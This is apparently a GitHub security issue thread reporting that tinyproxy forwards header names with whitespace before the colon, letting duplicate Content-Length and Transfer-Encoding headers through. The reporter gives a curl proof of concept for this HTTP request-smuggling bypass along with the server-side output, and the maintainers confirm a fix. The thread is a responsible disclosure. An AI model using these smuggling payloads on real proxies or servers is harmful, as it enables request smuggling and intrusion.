Space handling prior to colon allows bypass of CVE-2026-54388 fix

## Tinyproxy version
State the tinyproxy version you're using; whether git master or 1.11.0 stable.
This issue applies to tinyproxy 1.11.3-15-git-0253c07, downloaded 8/29/2026


## Issue
Tinyproxy does not respect RFC 9112 regarding space/tab characters between the Header name and the colon.  This allows an attacker to specify duplicate headers, for instance "Content-Length: 100" and "Content-Length : 200" (note the space) simultaneously.  Headers with this extra spacing are not identified as duplicates by Tinyproxy and are passed through to the end server.  If the server is lenient in the header spacing it accepts, the error condition described in CVE-2026-54388 is re-introduced. 

I would suggest that Tinyproxy either reject connections that display this malicious behavior or collapse eliminate any leading whitespace between the Header name and the colon prior to any security functionality that depends on performing string comparisons or deduplication upon the headers.

Example malicious connection:
----------------------------------
```
exec curl -sS -x http://127.0.0.1:18888 \
     -d HELLO \
     -H 'Content-Length : 100' \
     -H 'Content-Length  : 200' \
     -H 'Content-Length   : 300' \
     -H 'Content-Length    : 400' \
     -H 'Transfer-Encoding : chunked' \
     -H 'Transfer-Encoding  : chunked' \
     -H 'Transfer-Encoding   : chunked' \
     -H 'Transfer-Encoding    : chunked' \
     http://127.0.0.1:18080/
```
Received by the server:
-------------------------
```
POST / HTTP/1.1
Host: 127.0.0.1:18080
Connection: close
Via: 1.1 kali (tinyproxy)
User-Agent: curl/8.19.0
Accept: */*
Content-Length : 100
Content-Length  : 200
Content-Length   : 300
Content-Length    : 400
Transfer-Encoding : chunked
Transfer-Encoding  : chunked
Transfer-Encoding   : chunked
Transfer-Encoding    : chunked
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

HELLO
```
--------
end of example


For reference, the relevant section of RFC 9112 section 5.1:
"""No whitespace is allowed between the field name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject, with a response status code of 400 (Bad Request), any received request message that contains whitespace between a header field name and colon. A proxy MUST remove any such whitespace from a response message before forwarding the message downstream."""

I have posted this as a public issue as per the instructions in your security policy.  Please credit me in the CVE for this security fix.

-Eli




thanks for your report. the issue was addressed.

> Please credit me in the CVE for this security fix.

i'm not familiar with CVE processes. the rule here is "you found it, you file it".


Thank you all for your quick fix.  I have submitted the CVE request on my
end as requested.  I want to express my deep appreciation for everything
you guys do for open source.

Sorry that I hit you with this on a weekend!

-Eli

On Sun, Aug 30, 2026 at 7:14 AM rofl0r ***@***.***> wrote:

> *rofl0r* left a comment (tinyproxy/tinyproxy#623)
> <https://github.com/tinyproxy/tinyproxy/issues/623#issuecomment-5469190370>
>
> thanks for your report. the issue was addressed.
>
> Please credit me in the CVE for this security fix.
>
> i'm not familiar with CVE processes. the rule here is "you found it, you
> file it".
>
> —
> Reply to this email directly, view it on GitHub
> <https://github.com/tinyproxy/tinyproxy/issues/623?email_source=notifications&email_token=AJAWGVPQI2JGPDHUFZDLZ7D5MQZCZA5CNFSNUABFM5UWIORPF5TWS5BNNB2WEL2JONZXKZKDN5WW2ZLOOQXTKNBWHEYTSMBTG4YKM4TFMFZW63VGMF2XI2DPOKSWK5TFNZ2KYZTPN52GK4S7MNWGSY3L#issuecomment-5469190370>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/AJAWGVKHP2BWMPPZIWCZLHD5MQZCZAVCNFSNUABEKJSXA33TNF2G64TZHM2DONJVGYYDIOJ3JFZXG5LFHM2TEOJQG4ZTKNJRGCQXMAQ>
> .
> Triage notifications, keep track of coding agent tasks and review pull
> requests on the go with GitHub Mobile for iOS
> <https://github.com/notifications/mobile/ios/AJAWGVLHU6N6475DACIGJH35MQZCZA5CNFSNUABFM5UWIORPF5TWS5BNNB2WEL2JONZXKZKDN5WW2ZLOOQXTKNBWHEYTSMBTG4YKM4TFMFZW63VGMF2XI2DPOKSWK5TFNZ2KUZTPN52GK4S7NFXXG>
> and Android
> <https://github.com/notifications/mobile/android/AJAWGVN3XKOR27XYJHBVH6T5MQZCZA5CNFSNUABFM5UWIORPF5TWS5BNNB2WEL2JONZXKZKDN5WW2ZLOOQXTKNBWHEYTSMBTG4YKM4TFMFZW63VGMF2XI2DPOKSWK5TFNZ2K4ZTPN52GK4S7MFXGI4TPNFSA>.
> Download it today!
> You are receiving this because you authored the thread.Message ID:
> ***@***.***>
>
